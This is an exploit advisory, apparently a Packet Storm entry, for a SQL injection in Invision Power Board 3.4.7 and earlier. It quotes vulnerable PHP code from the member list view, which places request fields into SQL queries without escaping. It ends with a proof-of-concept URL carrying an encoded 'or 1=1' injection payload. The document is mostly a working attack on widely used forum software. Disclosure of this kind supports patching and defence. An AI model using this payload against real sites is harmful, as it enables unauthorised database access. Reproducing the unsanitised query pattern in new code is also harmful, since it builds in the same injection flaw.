Invision Power Board 3.4.7 SQL Injection

2015-05-29T00:00:00
ID PACKETSTORM:132087
Type packetstorm
Reporter ZeroDay
Modified 2015-05-29T00:00:00

Description

                                        
                                            `  
# Exploit Title: Invision Power Board <= 3.4.7 SQL Injection  
# Date: 29.05.2015  
# Exploit Author: ZeroDay  
# Software Link: http://www.invisionpower.com/  
# Version: <= 3.4.7  
# Tested on: 3.4.7  
# About: For the G-Owl with Love  
vuln code  
admin/applications/members/modules_public/list/view.php  
//-----------------------------------------  
// Custom fields?  
//-----------------------------------------  
if ( count( $this->custom_fields->out_fields ) )  
{  
foreach( $this->custom_fields->out_fields as $id => $data )  
{  
if ( !empty($this->request[ 'field_' . $id ]) )  
{  
$_queryPP = true;  
  
if( is_array($this->request[ 'field_' . $id ]) )  
{  
foreach( $this->request[ 'field_' . $id ] as $k => $v )  
{  
$this->request[ 'field_' . $id ][ $k ] = urldecode($v);  
$url['field_' . $id] = "field_{$id}[{$k}]=" . $v;  
}  
}  
else  
{  
$url['field_' . $id] = "field_{$id}=" . $this->request[ 'field_' . $id ];  
$this->request[ 'field_' . $id ] = urldecode($this->request[ 'field_' . $id ]);  
}  
  
if( $this->custom_fields->cache_data[ $id ]['pf_type'] == 'drop' )  
{  
$query[] = "p.field_{$id}='" . $this->request[ 'field_' . $id ] . "'";  
}  
else if( $this->custom_fields->cache_data[ $id ]['pf_type'] == 'cbox' )  
{  
if ( count( $this->request[ 'field_' . $id ] ) )  
{  
if ( $this->custom_fields->cache_data[ $id ]['pf_search_type'] == 'loose' )  
{  
$cboxFields = array();  
foreach ( $this->request[ 'field_' . $id ] as $k => $v )  
{  
$cboxFields[] = "p.field_{$id} LIKE '%|{$k}|%'";  
}  
  
$query[] = "( " . implode( ' OR ', $cboxFields ) . " )";  
}  
else  
{  
foreach ( $this->request[ 'field_' . $id ] as $k => $v )  
{  
$query[] = "p.field_{$id} LIKE '%|{$k}|%'";  
}  
}  
}  
}  
else  
{  
$query[] = $this->custom_fields->cache_data[ $id ]['pf_search_type'] == 'loose' ? "p.field_{$id} LIKE '%" . $this->request[ 'field_' . $id ] . "%'" : "p.field_{$id} = '" . $this->request[ 'field_' . $id ] . "'";  
}  
}  
}  
}  
......  
POC  
index.php?/members/?field_1=admin%2525%2527%2Bor%2B1%253D1--%2B1  
`